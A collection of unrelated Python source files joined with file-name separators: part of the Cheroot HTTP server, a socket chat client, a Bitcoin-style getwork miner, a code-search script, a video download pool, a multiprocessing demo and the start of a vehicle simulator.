self.requests = threadpool.ThreadPool(
self, min=minthreads or 1, max=maxthreads,
)
self.serving = False
if not server_name:
server_name = self.version
self.server_name = server_name
self.peercreds_enabled = peercreds_enabled
self.peercreds_resolve_enabled = (
peercreds_resolve_enabled and peercreds_enabled
)
self.clear_stats()
def clear_stats(self):
"""Reset server stat counters.."""
self._start_time = None
self._run_time = 0
self.stats = {
'Enabled': False,
'Bind Address': lambda s: repr(self.bind_addr),
'Run time': lambda s: (not s['Enabled']) and -1 or self.runtime(),
'Accepts': 0,
'Accepts/sec': lambda s: s['Accepts'] / self.runtime(),
'Queue': lambda s: getattr(self.requests, 'qsize', None),
'Threads': lambda s: len(getattr(self.requests, '_threads', [])),
'Threads Idle': lambda s: getattr(self.requests, 'idle', None),
'Socket Errors': 0,
'Requests': lambda s: (not s['Enabled']) and -1 or sum(
(w['Requests'](w) for w in s['Worker Threads'].values()), 0,
),
'Bytes Read': lambda s: (not s['Enabled']) and -1 or sum(
(w['Bytes Read'](w) for w in s['Worker Threads'].values()), 0,
),
'Bytes Written': lambda s: (not s['Enabled']) and -1 or sum(
(w['Bytes Written'](w) for w in s['Worker Threads'].values()),
0,
),
'Work Time': lambda s: (not s['Enabled']) and -1 or sum(
(w['Work Time'](w) for w in s['Worker Threads'].values()), 0,
),
'Read Throughput': lambda s: (not s['Enabled']) and -1 or sum(
(
w['Bytes Read'](w) / (w['Work Time'](w) or 1e-6)
for w in s['Worker Threads'].values()
), 0,
),
'Write Throughput': lambda s: (not s['Enabled']) and -1 or sum(
(
w['Bytes Written'](w) / (w['Work Time'](w) or 1e-6)
for w in s['Worker Threads'].values()
), 0,
),
'Worker Threads': {},
}
logging.statistics['Cheroot HTTPServer %d' % id(self)] = self.stats
def runtime(self):
"""Return server uptime."""
if self._start_time is None:
return self._run_time
else:
return self._run_time + (time.time() - self._start_time)
def __str__(self):
"""Render Server instance representing bind address."""
return '%s.%s(%r)' % (
self.__module__, self.__class__.__name__,
self.bind_addr,
)
@property
def bind_addr(self):
"""Return the interface on which to listen for connections.
For TCP sockets, a (host, port) tuple. Host values may be any
:term:`IPv4` or :term:`IPv6` address, or any valid hostname.
The string 'localhost' is a synonym for '127.0.0.1' (or '::1',
if your hosts file prefers :term:`IPv6`).
The string '0.0.0.0' is a special :term:`IPv4` entry meaning
"any active interface" (INADDR_ANY), and '::' is the similar
IN6ADDR_ANY for :term:`IPv6`.
The empty string or :py:data:`None` are not allowed.
For UNIX sockets, supply the file name as a string.
Systemd socket activation is automatic and doesn't require tempering
with this variable.
.. glossary::
:abbr:`IPv4 (Internet Protocol version 4)`
Internet Protocol version 4
:abbr:`IPv6 (Internet Protocol version 6)`
Internet Protocol version 6
"""
return self._bind_addr
@bind_addr.setter
def bind_addr(self, value):
"""Set the interface on which to listen for connections."""
if isinstance(value, tuple) and value[0] in ('', None):
# Despite the socket module docs, using '' does not
# allow AI_PASSIVE to work. Passing None instead
# returns '0.0.0.0' like we want. In other words:
# host AI_PASSIVE result
# '' Y 192.168.x.y
# '' N 192.168.x.y
# None Y 0.0.0.0
# None N 127.0.0.1
# But since you can get the same effect with an explicit
# '0.0.0.0', we deny both the empty string and None as values.
raise ValueError(
"Host values of '' or None are not allowed. "
"Use '0.0.0.0' (IPv4) or '::' (IPv6) instead "
'to listen on all active interfaces.',
)
self._bind_addr = value
def safe_start(self):
"""Run the server forever, and stop it cleanly on exit."""
try:
self.start()
except (KeyboardInterrupt, IOError):
# The time.sleep call might raise
# "IOError: [Errno 4] Interrupted function call" on KBInt.
self.error_log('Keyboard Interrupt: shutting down')
self.stop()
raise
except SystemExit:
self.error_log('SystemExit raised: shutting down')
self.stop()
raise
def prepare(self): # noqa: C901 # FIXME
"""Prepare server to serving requests.
It binds a socket's port, setups the socket to ``listen()`` and does
other preparing things.
"""
self._interrupt = None
if self.software is None:
self.software = '%s Server' % self.version
# Select the appropriate socket
self.socket = None
msg = 'No socket could be created'
if os.getenv('LISTEN_PID', None):
# systemd socket activation
self.socket = socket.fromfd(3, socket.AF_INET, socket.SOCK_STREAM)
elif isinstance(self.bind_addr, (six.text_type, six.binary_type)):
# AF_UNIX socket
try:
self.bind_unix_socket(self.bind_addr)
except socket.error as serr:
msg = '%s -- (%s: %s)' % (msg, self.bind_addr, serr)
six.raise_from(socket.error(msg), serr)
else:
# AF_INET or AF_INET6 socket
# Get the correct address family for our host (allows IPv6
# addresses)
host, port = self.bind_addr
try:
info = socket.getaddrinfo(
host, port, socket.AF_UNSPEC,
socket.SOCK_STREAM, 0, socket.AI_PASSIVE,
)
except socket.gaierror:
sock_type = socket.AF_INET
bind_addr = self.bind_addr
if ':' in host:
sock_type = socket.AF_INET6
bind_addr = bind_addr + (0, 0)
info = [(sock_type, socket.SOCK_STREAM, 0, '', bind_addr)]
for res in info:
af, socktype, proto, canonname, sa = res
try:
self.bind(af, socktype, proto)
break
except socket.error as serr:
msg = '%s -- (%s: %s)' % (msg, sa, serr)
if self.socket:
self.socket.close()
self.socket = None
if not self.socket:
raise socket.error(msg)
# Timeout so KeyboardInterrupt can be caught on Win32
self.socket.settimeout(1)
self.socket.listen(self.request_queue_size)
self.connections = connections.ConnectionManager(self)
# Create worker threads
self.requests.start()
self.ready = True
self._start_time = time.time()
def serve(self):
"""Serve requests, after invoking :func:`prepare()`."""
self.serving = True
while self.ready:
try:
self.tick()
except (KeyboardInterrupt, SystemExit):
raise
except Exception:
self.error_log(
'Error in HTTPServer.tick', level=logging.ERROR,
traceback=True,
)
self.serving = False
def start(self):
"""Run the server forever.
It is shortcut for invoking :func:`prepare()` then :func:`serve()`.
"""
# We don't have to trap KeyboardInterrupt or SystemExit here,
# because cherrypy.server already does so, calling self.stop() for us.
# If you're using this server with another framework, you should
# trap those exceptions in whatever code block calls start().
self.prepare()
self.serve()
@contextlib.contextmanager
def _run_in_thread(self):
"""Context manager for running this server in a thread."""
self.prepare()
thread = threading.Thread(target=self.serve)
thread.setDaemon(True)
thread.start()
try:
yield thread
finally:
self.stop()
def error_log(self, msg='', level=20, traceback=False):
"""Write error message to log.
Args:
msg (str): error message
level (int): logging level
traceback (bool): add traceback to output or not
"""
# Override this in subclasses as desired
sys.stderr.write('{msg!s}\n'.format(msg=msg))
sys.stderr.flush()
if traceback:
tblines = traceback_.format_exc()
sys.stderr.write(tblines)
sys.stderr.flush()
def bind(self, family, type, proto=0):
"""Create (or recreate) the actual socket object."""
sock = self.prepare_socket(
self.bind_addr,
family, type, proto,
self.nodelay, self.ssl_adapter,
)
sock = self.socket = self.bind_socket(sock, self.bind_addr)
self.bind_addr = self.resolve_real_bind_addr(sock)
return sock
def bind_unix_socket(self, bind_addr): # noqa: C901 # FIXME
"""Create (or recreate) a UNIX socket object."""
if IS_WINDOWS:
"""
Trying to access socket.AF_UNIX under Windows
causes an AttributeError.
"""
raise ValueError( # or RuntimeError?
'AF_UNIX sockets are not supported under Windows.',
)
fs_permissions = 0o777 # TODO: allow changing mode
try:
# Make possible reusing the socket...
os.unlink(self.bind_addr)
except OSError:
"""
File does not exist, which is the primary goal anyway.
"""
except TypeError as typ_err:
err_msg = str(typ_err)
if (
'remove() argument 1 must be encoded '
'string without null bytes, not unicode'
not in err_msg
and 'embedded NUL character' not in err_msg # py34
and 'argument must be a '
'string without NUL characters' not in err_msg # pypy2
):
raise
except ValueError as val_err:
err_msg = str(val_err)
if (
'unlink: embedded null '
'character in path' not in err_msg
and 'embedded null byte' not in err_msg
and 'argument must be a '
'string without NUL characters' not in err_msg # pypy3
):
raise
sock = self.prepare_socket(
bind_addr=bind_addr,
family=socket.AF_UNIX, type=socket.SOCK_STREAM, proto=0,
nodelay=self.nodelay, ssl_adapter=self.ssl_adapter,
)
try:
"""Linux way of pre-populating fs mode permissions."""
# Allow everyone access the socket...
os.fchmod(sock.fileno(), fs_permissions)
FS_PERMS_SET = True
except OSError:
FS_PERMS_SET = False
try:
sock = self.bind_socket(sock, bind_addr)
except socket.error:
sock.close()
raise
bind_addr = self.resolve_real_bind_addr(sock)
try:
"""FreeBSD/macOS pre-populating fs mode permissions."""
if not FS_PERMS_SET:
try:
os.lchmod(bind_addr, fs_permissions)
except AttributeError:
os.chmod(bind_addr, fs_permissions, follow_symlinks=False)
FS_PERMS_SET = True
except OSError:
pass
if not FS_PERMS_SET:
self.error_log(
'Failed to set socket fs mode permissions',
level=logging.WARNING,
)
self.bind_addr = bind_addr
self.socket = sock
return sock
@staticmethod
def prepare_socket(bind_addr, family, type, proto, nodelay, ssl_adapter):
"""Create and prepare the socket object."""
sock = socket.socket(family, type, proto)
connections.prevent_socket_inheritance(sock)
host, port = bind_addr[:2]
IS_EPHEMERAL_PORT = port == 0
if not (IS_WINDOWS or IS_EPHEMERAL_PORT):
"""Enable SO_REUSEADDR for the current socket.
Skip for Windows (has different semantics)
or ephemeral ports (can steal ports from others).
Refs:
* https://msdn.microsoft.com/en-us/library/ms740621(v=vs.85).aspx
* https://github.com/cherrypy/cheroot/issues/114
* https://gavv.github.io/blog/ephemeral-port-reuse/
"""
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
if nodelay and not isinstance(
bind_addr,
(six.text_type, six.binary_type),
):
sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
if ssl_adapter is not None:
sock = ssl_adapter.bind(sock)
# If listening on the IPV6 any address ('::' = IN6ADDR_ANY),
# activate dual-stack. See
# https://github.com/cherrypy/cherrypy/issues/871.
listening_ipv6 = (
hasattr(socket, 'AF_INET6')
and family == socket.AF_INET6
and host in ('::', '::0', '::0.0.0.0')
)
if listening_ipv6:
try:
sock.setsockopt(
socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 0,
)
except (AttributeError, socket.error):
# Apparently, the socket option is not available in
# this machine's TCP stack
pass
return sock
@staticmethod
def bind_socket(socket_, bind_addr):
"""Bind the socket to given interface."""
socket_.bind(bind_addr)
return socket_
@staticmethod
def resolve_real_bind_addr(socket_):
"""Retrieve actual bind address from bound socket."""
# FIXME: keep requested bind_addr separate real bound_addr (port
# is different in case of ephemeral port 0)
bind_addr = socket_.getsockname()
if socket_.family in (
# Windows doesn't have socket.AF_UNIX, so not using it in check
socket.AF_INET,
socket.AF_INET6,
):
"""UNIX domain sockets are strings or bytes.
In case of bytes with a leading null-byte it's an abstract socket.
"""
return bind_addr[:2]
if isinstance(bind_addr, six.binary_type):
bind_addr = bton(bind_addr)
return bind_addr
def tick(self):
"""Accept a new connection and put it on the Queue."""
conn = self.connections.get_conn()
if conn:
try:
self.requests.put(conn)
except queue.Full:
# Just drop the conn. TODO: write 503 back?
conn.close()
self.connections.expire()
@property
def interrupt(self):
"""Flag interrupt of the server."""
return self._interrupt
@interrupt.setter
def interrupt(self, interrupt):
"""Perform the shutdown of this server and save the exception."""
self._interrupt = True
self.stop()
self._interrupt = interrupt
if self._interrupt:
raise self.interrupt
def stop(self): # noqa: C901 # FIXME
"""Gracefully shutdown a server that is serving forever."""
self.ready = False
if self._start_time is not None:
self._run_time += (time.time() - self._start_time)
self._start_time = None
# ensure serve is no longer accessing socket, connections
while self.serving:
time.sleep(0.1)
sock = getattr(self, 'socket', None)
if sock:
if not isinstance(
self.bind_addr,
(six.text_type, six.binary_type),
):
# Touch our own socket to make accept() return immediately.
try:
host, port = sock.getsockname()[:2]
except socket.error as ex:
if ex.args[0] not in errors.socket_errors_to_ignore:
# Changed to use error code and not message
# See
# https://github.com/cherrypy/cherrypy/issues/860.
raise
else:
# Note that we're explicitly NOT using AI_PASSIVE,
# here, because we want an actual IP to touch.
# localhost won't work if we've bound to a public IP,
# but it will if we bound to '0.0.0.0' (INADDR_ANY).
for res in socket.getaddrinfo(
host, port, socket.AF_UNSPEC,
socket.SOCK_STREAM,
):
af, socktype, proto, canonname, sa = res
s = None
try:
s = socket.socket(af, socktype, proto)
# See
# https://groups.google.com/group/cherrypy-users/
# browse_frm/thread/bbfe5eb39c904fe0
s.settimeout(1.0)
s.connect((host, port))
s.close()
except socket.error:
if s:
s.close()
if hasattr(sock, 'close'):
sock.close()
self.socket = None
self.connections.close()
self.requests.stop(self.shutdown_timeout)
class Gateway:
"""Base class to interface HTTPServer with other systems, such as WSGI."""
def __init__(self, req):
"""Initialize Gateway instance with request.
Args:
req (HTTPRequest): current HTTP request
"""
self.req = req
def respond(self):
"""Process the current request. Must be overridden in a subclass."""
raise NotImplementedError # pragma: no cover
# These may either be ssl.Adapter subclasses or the string names
# of such classes (in which case they will be lazily loaded).
ssl_adapters = {
'builtin': 'cheroot.ssl.builtin.BuiltinSSLAdapter',
'pyopenssl': 'cheroot.ssl.pyopenssl.pyOpenSSLAdapter',
}
def get_ssl_adapter_class(name='builtin'):
"""Return an SSL adapter class for the given name."""
adapter = ssl_adapters[name.lower()]
if isinstance(adapter, six.string_types):
last_dot = adapter.rfind('.')
attr_name = adapter[last_dot + 1:]
mod_path = adapter[:last_dot]
try:
mod = sys.modules[mod_path]
if mod is None:
raise KeyError()
except KeyError:
# The last [''] is important.
mod = __import__(mod_path, globals(), locals(), [''])
# Let an AttributeError propagate outward.
try:
adapter = getattr(mod, attr_name)
except AttributeError:
raise AttributeError(
"'%s' object has no attribute '%s'"
% (mod_path, attr_name),
)
return adapter
|
client.py
|
from socket import AF_INET, socket, SOCK_STREAM
from threading import Thread, Lock
import time
class Client:
"""
for communication with server
"""
HOST = "192.168.1.4"
PORT = 5500
ADDR = (HOST, PORT)
BUFSIZ = 512
def __init__(self, name):
"""
Init object and send name to server
:param name: str
"""
self.client_socket = socket(AF_INET, SOCK_STREAM)
self.client_socket.connect(self.ADDR)
self.messages = []
receive_thread = Thread(target=self.receive_messages)
receive_thread.start()
self.send_message(name)
self.lock = Lock()
def receive_messages(self):
"""
receive messages from server
:return: None
"""
while True:
try:
msg = self.client_socket.recv(self.BUFSIZ).decode()
# make sure memory is safe to access
self.lock.acquire()
self.messages.append(msg)
self.lock.release()
except Exception as e:
print("[EXCPETION]", e)
break
def send_message(self, msg):
"""
send messages to server
:param msg: str
:return: None
"""
try:
self.client_socket.send(bytes(msg, "utf8"))
if msg == "{quit}":
self.client_socket.close()
except Exception as e:
self.client_socket = socket(AF_INET, SOCK_STREAM)
self.client_socket.connect(self.ADDR)
print(e)
def get_messages(self):
"""
:returns a list of str messages
:return: list[str]
"""
messages_copy = self.messages[:]
# make sure memory is safe to access
self.lock.acquire()
self.messages = []
self.lock.release()
return messages_copy
def disconnect(self):
self.send_message("{quit}")
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
// Copyright (c) 2014 Joey Krug and Jack Peterson
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class SidecoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = SidecoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 8332
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
search.py
|
import os
import sys
import traceback
import numpy as np
import argparse
import threading
import codecs
import logging
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO, format="%(message)s")
from tensorboardX import SummaryWriter # install tensorboardX (pip install tensorboardX) before importing this package
import torch
from utils import normalize, similarity, sent2indexes
from data_loader import load_dict, load_vecs
import models, configs
codevecs, codebase = [], []
##### Data Set #####
def load_codebase(code_path, chunk_size=2000000):
"""load codebase
codefile: h5 file that stores raw code
"""
logger.info(f'Loading codebase (chunk size={chunk_size})..')
codebase= []
codes = codecs.open(code_path, encoding='latin-1').readlines() # use codecs to read in case of encoding problem
for i in range(0, len(codes), chunk_size):
codebase.append(codes[i: i+chunk_size])
'''
import subprocess
n_lines = int(subprocess.check_output(["wc", "-l", code_path], universal_newlines=True).split()[0])
for i in range(1, n_lines+1, chunk_size):
codecs = subprocess.check_output(["sed",'-n',f'{i},{i+chunk_size}p', code_path]).split()
codebase.append(codecs)
'''
return codebase
### Results Data ###
def load_codevecs(vec_path, chunk_size=2000000):
logger.debug(f'Loading code vectors (chunk size={chunk_size})..')
"""read vectors (2D numpy array) from a hdf5 file"""
codevecs=[]
chunk_id = 0
chunk_path = f"{vec_path[:-3]}_part{chunk_id}.h5"
while os.path.exists(chunk_path):
reprs = load_vecs(chunk_path)
codevecs.append(reprs)
chunk_id+=1
chunk_path = f"{vec_path[:-3]}_part{chunk_id}.h5"
return codevecs
def search(config, model, vocab, query, n_results=10):
model.eval()
device = next(model.parameters()).device
desc, desc_len =sent2indexes(query, vocab_desc, config['desc_len'])#convert query into word indices
desc = torch.from_numpy(desc).unsqueeze(0).to(device)
desc_len = torch.from_numpy(desc_len).clamp(max=config['desc_len']).to(device)
with torch.no_grad():
desc_repr = model.desc_encoding(desc, desc_len).data.cpu().numpy().astype(np.float32) # [1 x dim]
if config['sim_measure']=='cos': # normalizing vector for fast cosine computation
desc_repr = normalize(desc_repr) # [1 x dim]
results =[]
threads = []
for i, codevecs_chunk in enumerate(codevecs):
t = threading.Thread(target=search_thread, args = (results, desc_repr, codevecs_chunk, i, n_results, config['sim_measure']))
threads.append(t)
for t in threads:
t.start()
for t in threads:#wait until all sub-threads have completed
t.join()
return results
def search_thread(results, desc_repr, codevecs, i, n_results, sim_measure):
#1. compute code similarities
if sim_measures=='cos':
chunk_sims = np.dot(codevecs, desc_repr.T)[:,0] # [pool_size]
else:
chunk_sims = similarity(codevecs, desc_repr, sim_measure) # [pool_size]
#2. select the top K results
negsims = np.negative(chunk_sims)
maxinds = np.argpartition(negsims, kth=n_results-1)
maxinds = maxinds[:n_results]
chunk_codes = [codebase[i][k] for k in maxinds]
chunk_sims = chunk_sims[maxinds]
results.extend(zip(chunk_codes, chunk_sims))
def postproc(codes_sims):
codes_, sims_ = zip(*codes_sims)
codes = [code for code in codes_]
sims = [sim for sim in sims_]
final_codes = []
final_sims = []
n = len(codes_sims)
for i in range(n):
is_dup=False
for j in range(i):
if codes[i][:80]==codes[j][:80] and abs(sims[i]-sims[j])<0.01:
is_dup=True
if not is_dup:
final_codes.append(codes[i])
final_sims.append(sims[i])
return zip(final_codes,final_sims)
def parse_args():
parser = argparse.ArgumentParser("Train and Test Code Search(Embedding) Model")
parser.add_argument('--data_path', type=str, default='./data/', help='location of the data corpus')
parser.add_argument('--model', type=str, default='JointEmbeder', help='model name')
parser.add_argument('-d', '--dataset', type=str, default='github', help='name of dataset.java, python')
parser.add_argument('--reload_from', type=int, default=-1, help='step to reload from')
parser.add_argument('--chunk_size', type=int, default=2000000, help='codebase and code vector are stored in many chunks. '\
'Note: should be consistent with the same argument in the repr_code.py')
parser.add_argument('-g', '--gpu_id', type=int, default=0, help='GPU ID')
parser.add_argument('-v', "--visual",action="store_true", default=False, help="Visualize training status in tensorboard")
return parser.parse_args()
if __name__ == '__main__':
args = parse_args()
device = torch.device(f"cuda:{args.gpu_id}" if torch.cuda.is_available() else "cpu")
config = getattr(configs, 'config_'+args.model)()
##### Define model ######
logger.info('Constructing Model..')
model = getattr(models, args.model)(config)#initialize the model
ckpt=f'./output/{args.model}/{args.dataset}/models/step{args.reload_from}.h5'
model.load_state_dict(torch.load(ckpt, map_location=device))
data_path = args.data_path+args.dataset+'/'
vocab_desc = load_dict(data_path+config['vocab_desc'])
codebase = load_codebase(data_path+config['use_codebase'], args.chunk_size)
codevecs = load_codevecs(data_path+config['use_codevecs'], args.chunk_size)
assert len(codebase)==len(codevecs), \
"inconsistent number of chunks, check whether the specified files for codebase and code vectors are correct!"
while True:
try:
query = input('Input Query: ')
n_results = int(input('How many results? '))
except Exception:
print("Exception while parsing your input:")
traceback.print_exc()
break
query = query.lower().replace('how to ', '').replace('how do i ', '').replace('how can i ', '').replace('?', '').strip()
results = search(config, model, vocab_desc, query, n_results)
results = sorted(results, reverse=True, key=lambda x:x[1])
results = postproc(results)
results = list(results)[:n_results]
results = '\n\n'.join(map(str,results)) #combine the result into a returning string
print(results)
|
parallel_download.py
|
import os
from multiprocessing import Process, Queue
import lib.downloader as downloader
class Pool:
"""
A pool of video downloaders.
"""
def __init__(self, classes, videos_dict, directory, num_workers, failed_save_file, compress, verbose, skip,
log_file=None):
"""
:param classes: List of classes to download.
:param videos_dict: Dictionary of all videos.
:param directory: Where to download to videos.
:param num_workers: How many videos to download in parallel.
:param failed_save_file: Where to save the failed videos ids.
:param compress: Whether to compress the videos using gzip.
"""
self.classes = classes
self.videos_dict = videos_dict
self.directory = directory
self.num_workers = num_workers
self.failed_save_file = failed_save_file
self.compress = compress
self.verbose = verbose
self.skip = skip
self.log_file = log_file
self.videos_queue = Queue(100)
self.failed_queue = Queue(100)
self.workers = []
self.failed_save_worker = None
if verbose:
print("downloading:")
if self.classes is not None:
for cls in self.classes:
print(cls)
print()
def feed_videos(self):
"""
Feed video ids into the download queue.
:return: None.
"""
if self.classes is None:
downloader.download_class_parallel(None, self.videos_dict, self.directory, self.videos_queue)
else:
for class_name in self.classes:
if self.verbose:
print(class_name)
class_path = os.path.join(self.directory, class_name.replace(" ", "_"))
if not self.skip or not os.path.isdir(class_path):
downloader.download_class_parallel(class_name, self.videos_dict, self.directory, self.videos_queue)
if self.verbose:
print("done")
def start_workers(self):
"""
Start all workers.
:return: None.
"""
# start failed videos saver
if self.failed_save_file is not None:
self.failed_save_worker = Process(target=write_failed_worker, args=(self.failed_queue, self.failed_save_file))
self.failed_save_worker.start()
# start download workers
for _ in range(self.num_workers):
worker = Process(target=video_worker, args=(self.videos_queue, self.failed_queue, self.compress, self.log_file))
worker.start()
self.workers.append(worker)
def stop_workers(self):
"""
Stop all workers.
:return: None.
"""
# send end signal to all download workers
for _ in range(len(self.workers)):
self.videos_queue.put(None)
# wait for the processes to finish
for worker in self.workers:
worker.join()
# end failed videos saver
if self.failed_save_worker is not None:
self.failed_queue.put(None)
self.failed_save_worker.join()
def video_worker(videos_queue, failed_queue, compress, log_file):
"""
Downloads videos pass in the videos queue.
:param videos_queue: Queue for metadata of videos to be download.
:param failed_queue: Queue of failed video ids.
:param compress: Whether to compress the videos using gzip.
:param log_file: Path to a log file for youtube-dl.
:return: None.
"""
while True:
request = videos_queue.get()
if request is None:
break
video_id, directory, start, end = request
if not downloader.process_video(video_id, directory, start, end, compress=compress, log_file=log_file):
failed_queue.put(video_id)
def write_failed_worker(failed_queue, failed_save_file):
"""
Write failed video ids into a file.
:param failed_queue: Queue of failed video ids.
:param failed_save_file: Where to save the videos.
:return: None.
"""
file = open(failed_save_file, "a")
while True:
video_id = failed_queue.get()
if video_id is None:
break
file.write("{}\n".format(video_id))
file.close()
|
mp_temp.py
|
import multiprocessing as mp
import os
class cl:
def __init__(self):
self.x = 1
def set(self):
self.x = os.getpid()
def __str__(self):
return str(self.x)
def run(a):
a.set()
print("Current pid, ", os.getpid(), a)
print(a)
if __name__ == "__main__":
a = cl()
print("Current pid", os.getpid())
p = mp.Process(target=run, args=(a,))
p.start()
p.join()
print(a)
|
Post_MainEnvironmentSimulator.py
|
#Post_MainEnvironmentSimulator.py
#Environment simulator + REST-Server + AdvantEDGE
#Version:4
#Date:2020-04-14
#Author: Jaime Burbano
#Description: This set of files are used to run the first simulation of the system using AdvantEDGE
#runs with python 3
#python3 MainEnvironmentSimulator v001
import argparse
import threading
import time
import queue
from datetime import datetime
import ScenarioReader #reads the variables of the scenario
import VehicleMovemenManager as movement #Converts the speed of the car to X ms/s
import HazardManager
import PoAManager#Manages the change of PoA
import logging
#import RestClientSingle as RESTclient #Interacts with the REST-Server #UNCOMMENT to use single server approach
import RestClientWindow as RESTclient #Interacts with the REST-Server #UNCOMMENT to use Window approach
#Receives as an argument the ID of the vehicle
parser = argparse.ArgumentParser()
parser.add_argument("Vehicle_ID", help="type the vehicle ID (V001,V002...)")
args = parser.parse_args()
App_ID=args.Vehicle_ID #the given Vehicle ID must match with the one of the scenario
#Configuration of the logging file
log_path='/home/jaime/Desktop/code/AdvantEDGE/2020-04-11/code/HNA_Individual_Test_Case/loggers/'
log_file_name='HNA_TC1_TEST.log'
log_file=log_path+log_file_name
logging.basicConfig(level=logging.INFO, filename=log_file, filemode='a', format='%(name)s - %(levelname)s - %(message)s')
"""
SCRIPT VARIABLES
"""
end_flag=1 #Determines when to finish the simulation
synch_delay=1#time to wait in minutes before running the script in order to synch all the clients
detection_range=1 #The detection range in meters in which the car can detect a hazzard
simulation_speed=10 #determines the speed of the vehicle in ms. This value must match with the time.sleep of the movement thread
hazard_generator=['equidistant',20] #sets how to create the hazard and the separation distance
"""
QUEUE DECLARATION
"""
